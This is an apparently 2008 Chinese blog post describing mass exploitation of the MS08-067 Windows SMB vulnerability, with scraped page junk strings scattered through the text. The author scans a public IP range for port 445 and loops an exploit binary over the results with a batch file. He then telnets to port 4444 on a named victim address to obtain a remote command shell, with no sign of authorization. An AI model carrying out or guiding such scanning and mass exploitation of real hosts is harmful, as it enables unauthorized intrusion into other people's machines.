MS08-067溢出漏洞

上一篇 / 下一篇  2008-11-30 08:29:03

查看( 39 ) / 评论( 0 ) / 评分( 0 / 0 )

7nWp+@{B#{[0这几天看到爆出的ms08067漏洞貌似很强啊,好多地方都放出了EXP及使用方法,甚至还有批量溢出的工具。我本人还是比较喜欢溢出漏洞的,因为只要对方机子没打这个补丁那么就能够直接获得对方cmdshell一个,有了cmd权限那还缺啥呢?O(∩_∩)O哈哈~记得当初那个ms06040溢出漏洞是非常非常不错的,成功率几乎是100%,今天来小试一把ms08067。IXPUB技术博客x ZX:k8]0x}f ^Rk
找到我自己的IP 117.36.1.180,然后扩大IP段到117.36.1.1-117.36.50.254,接着对这段IP进行445端口扫描,得到结果保存为08067.txt

1\ ih1h?l!A3d0

2V3Hk2A?(_`'ab};J0IXPUB技术博客xGZd8Z o"bEX

6Dj#k&[7V;|0为了节省时间,自己写了个BAT批处理,内容如下:IXPUB技术博客8[[qY2R7o
for /f %%i in (08067.txt) do exp %%i
z([|3]/O0然后进入cmd并执行exp.batIXPUB技术博客.y*n.A(}{.Q)nHg

T_/?Z0u!MU0IXPUB技术博客x&m3\|{"ik

-hcxx0H+w@0IXPUB技术博客V C}*L4r s"CR,q*U


F m&Z!C2t J4iW0 

3y*e:~/l6S/S0IXPUB技术博客4F/OQ&D`\'fo

只有提示Send Payload Over!才会成功。接着执行telnet 117.36.7.27 4444(必须是4444端口)即可得到cmdshell。
C4m.D+T"^0 IXPUB技术博客)S*^:l8q+A[|

IXPUB技术博客U)G%`3to/U#hR

经过测试,成功率不是很高,在10%左右,而且有些提示溢出成功了但是去telnet不上。IXPUB技术博客.RM"lt1WQ#r W


4

4

导入论坛 引用链接 收藏 分享给好友 推荐到圈子 管理 举报

TAG:

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

日历

« 2009-01-05  
    123
45678910
11121314151617
18192021222324
25262728293031

数据统计

  • 访问量: 64893
  • 日志数: 1202
  • 文件数: 1
  • 建立时间: 2007-08-10
  • 更新时间: 2009-01-05

RSS订阅

Open Toolbar